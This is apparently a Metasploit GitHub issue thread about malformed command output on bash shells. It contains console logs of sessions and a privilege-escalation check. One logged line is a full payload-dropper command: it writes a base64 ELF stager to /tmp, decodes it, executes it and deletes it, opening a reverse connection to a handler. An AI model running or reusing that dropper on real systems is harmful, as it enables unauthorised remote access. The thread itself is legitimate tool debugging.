Command tokenisation is failing on bash command shells

[bcoles]

Command tokenisation is failing on bash command shells.

I'm pretty sure this wasn't always the case.

I've run into this issue using bash shells on Linux (modern bash, using a reverse bash shell) and Solaris (old bash ~2013, using bash shell from ssh_login) this week.

Command output returned from cmd_exec is malformed.

Output from sessions is also malformed (see session 21).

msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                          Connection
  --  ----  ----                   -----------                                                          ----------
  11        meterpreter x64/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ localhost.localdomain     172.16.redacted
  12        meterpreter x64/linux  uid=0, gid=0, euid=0, egid=0 @ localhost.localdomain                 172.16.redacted
  13        meterpreter x64/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ 172.16.191.211            172.16.redacted
  16        meterpreter x64/linux  uid=0, gid=0, euid=0, egid=0 @ 172.16.191.211                        172.16.redacted
  17        shell cmd/unix                                                                              172.16.redacted
  18        meterpreter x64/linux  uid=0, gid=0, euid=0, egid=0 @ localhost.localdomain                 172.16.redacted
  19        meterpreter x64/linux  uid=0, gid=0, euid=0, egid=0 @ localhost.localdomain                 172.16.redacted
  21        shell cmd/unix         msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > 

---

Edit: This is the third time this issue has been encountered. It was fixed upon initial discovery a year or two ago, then reintroduced, then fixed, and now present again.

Clearly the test cases related to cmd_exec are inadequate. The code responsible for introducing this issue likely needs some code comments documenting the reason for using the current code pattern, and warning against modification.

[bcoles]

msf5 exploit(multi/handler) > use exploit/linux/local/ptrace_traceme_pkexec_helper 
msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set session 22
session => 22
msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > check

[!] SESSION may not be compatible with this module.
[+] Kernel version 4.15.0-20-generic appears to be vulnerable
[-] pkexec is not installed
[*] The target is not exploitable.
msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > sessions -u 22
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [22]

[*] Upgrading session ID: 22
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.191.165:4433 
[*] Sending stage (985320 bytes) to 172.16.191.211
[*] Meterpreter session 23 opened (172.16.191.165:4433 -> 172.16.191.211:45296) at 2019-10-23 09:26:46 -0400
[-] Error: Unable to execute the following command: "echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1torBC/pWgCABFRieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/lkAuX.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/JFlMm' < '/tmp/lkAuX.b64' ; chmod +x '/tmp/JFlMm' ; '/tmp/JFlMm' & sleep 2 ; rm -f '/tmp/JFlMm' ; rm -f '/tmp/lkAuX.b64'"
[-] Output: "[1] 11271"
msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > sessions -i 23
[*] Starting interaction with 23...

rootndmeterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
rootndmeterpreter > 
Background session 23? [y/N]  
msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > set session 23
session => 23
msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > check

[!] SESSION may not be compatible with this module.
[+] Kernel version 4.15.0-20-generic appears to be vulnerable
[+] pkexec is installed
[+] System architecture x86_64 is supported
[*] The target appears to be vulnerable.
msf5 exploit(linux/local/ptrace_traceme_pkexec_helper) > 

[bcoles]

I ran into this a few more times, but no longer have logs. Basically the same issue.

To clarify, this issue does not appear to be specific to reverse_bash, but rather, some (any?) command shell on a system that uses Bash for a shell. That said, it's likely also not specific to Bash.

My guess is that the issue is due to output tokenisation, and user@host $ in the output is messing it up. But I haven't looked into it.

[bcoles]

This issue may be related to #12579 and #12487.

[github-actions]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.